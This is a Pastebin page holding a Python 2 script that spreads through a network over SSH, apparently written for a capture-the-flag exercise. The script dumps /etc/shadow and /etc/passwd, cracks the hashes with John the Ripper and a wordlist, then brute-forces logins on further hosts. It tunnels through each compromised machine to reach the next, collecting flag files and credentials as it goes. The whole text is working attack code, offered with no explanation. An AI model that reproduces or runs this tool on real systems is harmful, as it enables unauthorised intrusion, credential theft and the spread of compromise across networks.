Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- import paramiko
- import sys
- import os
- import subprocess
- import re
- current_user = sys.argv[1]
- current_pass = sys.argv[2]
- creds = {"SELF":[(current_user,current_pass)]}
- #users = ["root","student"]
- #passwords = ["student","student123"]
- users = [current_user]
- passwords = [current_pass]
- credmatcher = re.compile('^(\S+)\s+\((\S+)\)$')
- flag_org = {}
- visited = []
- count_shadow = 0
- count_ssh_key = 0
- ip_tmp = []
- ip = [] #tuples: (ip_addr, where it's from)
- revisit = []
- conn = {} #key:host, value:(tunnel,connection)
- # client is the ssh client, dest is ip
- def tunnel_from_client(dest,user,pw,client=None):
- paramiko.util.log_to_file("log.txt")
- dest_info = dest.split(":")
- dest_ip = dest_info[0]
- dest_port = int(dest_info[1])
- dest_client = paramiko.SSHClient()
- dest_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- if client:
- trans = client.get_transport()
- ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',22),dest_addr=(dest_ip,dest_port))
- """
- if src_port:
- ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',src_port),dest_addr=(dest_ip,dest_port))
- else:
- ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',22),dest_addr=(dest_ip,dest_port))
- #ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',22),dest_addr=(dest_ip,dest_port))
- """
- dest_client.connect(dest_ip,port=dest_port,username=user,password=pw,sock=ch)
- else:
- trans = None
- dest_client.connect(dest_ip,port=dest_port,username=user,password=pw)
- return trans,dest_client
- def jack(password,shadow):
- changed = False
- global users, passwords,count_shadow
- count_shadow += 1
- try:
- p = open("password.txt","w")
- u = open("shadow.txt","w")
- p.write(str(password))
- p.close()
- u.write(str(shadow))
- u.close()
- #subprocess.Popen("umask 077",shell=True)
- subprocess.Popen("unshadow password.txt shadow.txt > mypasswd",shell=True)
- result = subprocess.Popen("john mypasswd --wordlist=rockyou.txt",stdout=subprocess.PIPE,shell=True)
- for line in result.stdout.readlines():
- creds = credmatcher.match(line)
- if creds:
- u = creds.group(2)
- if u not in users:
- users.append(u)
- changed = True
- p = creds.group(1)
- if p not in passwords:
- passwords.append(p)
- changed = True
- subprocess.Popen("rm password.txt shadow.txt mypasswd",shell=True)
- return changed
- except Exception as e:
- print e
- exc_type, exc_obj, exc_tb = sys.exc_info()
- fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
- print(exc_type, fname, exc_tb.tb_lineno)
- print "Cannot crack passwords"
- return changed
- def crack(ip_addr,come_from):
- global conn,creds
- for u in users:
- for p in passwords:
- try:
- print "[*] Attempting login to "+ip_addr+" with " + u + "/" + p
- if come_from in conn.keys():
- _,connection = conn[come_from]
- tunnel,client = tunnel_from_client(ip_addr,u,p,connection)
- else:
- tunnel,client=tunnel_from_client(ip_addr,u,p)
- if ip_addr in creds.keys():
- creds[ip_addr].append((u,p))
- else:
- creds[ip_addr] = [(u,p)]
- conn[ip_addr] = (tunnel,client)
- visited.append(ip_addr)
- print "[*] Login to " + ip_addr + " succeeded"
- # TODO add to creds list
- return u
- except Exception as e:
- #print e
- continue
- return False
- # revisit all the computers in revisit to try and crack root
- # once root is cracked go to etc password and etc shadow
- def rerevisit():
- global revisit,creds
- tmp2 = []
- for ip_addr, from_where in revisit:
- for p in passwords:
- try:
- print "[*] *revisiting for root* Attempting login to "+ip_addr+" with root/" + p
- if from_where:
- _,connection,src_port = conn[from_where]
- tunnel,client = tunnel_from_client(ip_addr,"root",p,connection)
- else:
- tunnel,client = tunnel_from_client(ip_addr,"root",p)
- connection=client
- conn[ip_addr] = (tunnel,client)
- tmp2.append((ip_addr,from_where))
- print "[*] Login to " + ip_addr + " succeeded"
- if ip_addr in creds.keys():
- creds[ip_addr].append(("root",p))
- else:
- creds[ip_addr] = [("root",p)]
- # TODO look for flags and server
- _,stdout,stderr=connection.exec_command("cat ~/servers.txt")
- tmp = stdout.read()
- if tmp:
- print "[*] Found servers file on " + ip_addr
- for i in tmp.strip().split("\n"):
- # TODO print statement
- if i not in ip_tmp:
- ip.append((i,ip_addr))
- ip_tmp.append(i)
- # every time you update this list, go thru revisit once
- print "[+] Adding " + str(tmp.strip().split("\n")) + " to global target queue"
- else:
- print "[*] Servers file not found on " + ip_addr
- _,stdout,stderr=connection.exec_command("cat /flag.txt")
- tmp = stdout.read()
- if tmp:
- if ip_addr not in flag_org.keys():
- print "[!] Flag file found on " + ip_addr + ", contents: \"" + tmp + "\""
- flag_org[ip_addr] = tmp
- else:
- print "[!] Flag file had been found before on " + ip_addr
- elif stderr.read():
- print "[*] No flag file found on " + ip_addr
- _,stdout,stderr=connection.exec_command("cat /etc/shadow")
- shadow = stdout.read()
- _,stdout,stderr=connection.exec_command("cat /etc/passwd")
- passwd = stdout.read()
- # TODO add to etc shadow count
- jack(passwd,shadow)
- # rerevisit()
- except Exception as e:
- continue
- print "ERRORRR"
- exc_type, exc_obj, exc_tb = sys.exc_info()
- fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
- print(exc_type, fname, exc_tb.tb_lineno)
- print e
- continue
- for i in tmp2:
- revisit.remove(i)
- ip_list = subprocess.Popen("cat ~/servers.txt",stdout=subprocess.PIPE,shell=True)
- print "[*] Read targets file"
- for i in ip_list.stdout.read().strip().split("\n"):
- ip.append((i,None))
- # TODO crack password file for initial server, append to users and passwords
- shadow = subprocess.Popen("cat /etc/shadow",stdout=subprocess.PIPE,shell=True)
- passwd = subprocess.Popen("cat /etc/passwd",stdout=subprocess.PIPE,shell=True)
- jack(passwd.stdout.read(),shadow.stdout.read())
- while(ip):
- #print "current IP list: " + str(ip)
- #print "need to revisit: " + str(revisit)
- current,come_from = ip.pop(0)
- u = crack(current,come_from)
- if not ((set(ip)|set(revisit))-set(visited)):
- break
- try:
- if u:
- if u != "root":
- revisit.append((current,come_from))
- _,connection = conn[current]
- _,stdout,stderr=connection.exec_command("cat ~/servers.txt")
- tmp = stdout.read()
- if tmp:
- print "[*] Found servers file on " + current
- for i in tmp.strip().split("\n"):
- # TODO print statement
- if i not in ip_tmp:
- ip.append((i,current))
- ip_tmp.append(i)
- # every time you update this list, go thru revisit once
- print "[+] Adding " + str(tmp.strip().split("\n")) + " to global target queue"
- else:
- print "[*] Servers file not found on " + current
- _,stdout,stderr=connection.exec_command("cat /flag.txt")
- f = stdout.read()
- if f:
- if current not in flag_org.keys():
- print "[!] Flag file found on " + current + ", contents: \"" + f + "\""
- flag_org[current] = f
- else:
- print "[!] Flag file had been found before on " + current
- elif stderr.read():
- print "[*] No flag file found on " + current
- _,stdout,stderr=connection.exec_command("cat /etc/shadow")
- tmp = stdout.read()
- if tmp:
- _,stdout,stderr=connection.exec_command("cat /etc/passwd")
- print "[*] Dumping /etc/shadow"
- jack(stdout.read(),tmp)
- rerevisit()
- elif stderr.read():
- print "[*] User "+u+" on "+current+" cannot access /etc/shadow"
- else:
- print "[*] " + current + " back in line"
- ip.append((current,come_from))
- except Exception as e:
- exc_type, exc_obj, exc_tb = sys.exc_info()
- fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
- print e
- print exc_tb.tb_lineno
- continue
- print "\n\n=========="
- print "Collected " + str(count_shadow) + " /etc/shadow files"
- print "Cracked " + str(len(passwords)) + " Passwords"
- print "Found " + str(len(flag_org.keys())) + " flag files"
- print "Accessed following ips: " + str(creds)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement